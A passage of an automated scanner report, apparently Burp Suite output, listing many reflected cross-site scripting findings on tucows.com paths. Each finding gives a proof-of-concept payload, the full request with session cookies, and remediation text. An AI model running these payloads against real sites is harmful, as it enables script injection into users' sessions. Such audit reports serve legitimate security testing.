HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:36 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53589"-alert(1)-"260f69e5fea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js53589"-alert(1)-"260f69e5fea/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d6bc"-alert(1)-"8adb3574f02 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/yetii.js2d6bc"-alert(1)-"8adb3574f02 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:58 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.66. http://www.tucows.com/images/newassets/includes/js/yetii.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/yetii.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 772af"-alert(1)-"9c97d81b22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/yetii.js?772af"-alert(1)-"9c97d81b22b=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e824"-alert(1)-"ef3735f6727 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images4e824"-alert(1)-"ef3735f6727/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5359"-alert(1)-"a9fa148b261 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetse5359"-alert(1)-"a9fa148b261/includes/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:19 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175cb"-alert(1)-"c07ddec345e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes175cb"-alert(1)-"c07ddec345e/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bed4"-alert(1)-"bc0cdf6abcf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes5bed4"-alert(1)-"bc0cdf6abcf/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:39 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7990"-alert(1)-"6641f3a44d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeanyf7990"-alert(1)-"6641f3a44d/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b53b3"-alert(1)-"2154049023 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/style.cssb53b3"-alert(1)-"2154049023 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329b8"-alert(1)-"ca5ec70f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/style.css?329b8"-alert(1)-"ca5ec70f733=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d20f"-alert(1)-"fab829ca50f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images6d20f"-alert(1)-"fab829ca50f/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:10 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b37a5"-alert(1)-"3c4c9d14a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsb37a5"-alert(1)-"3c4c9d14a1d/includes/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:18 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3ab"-alert(1)-"412e4b918b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
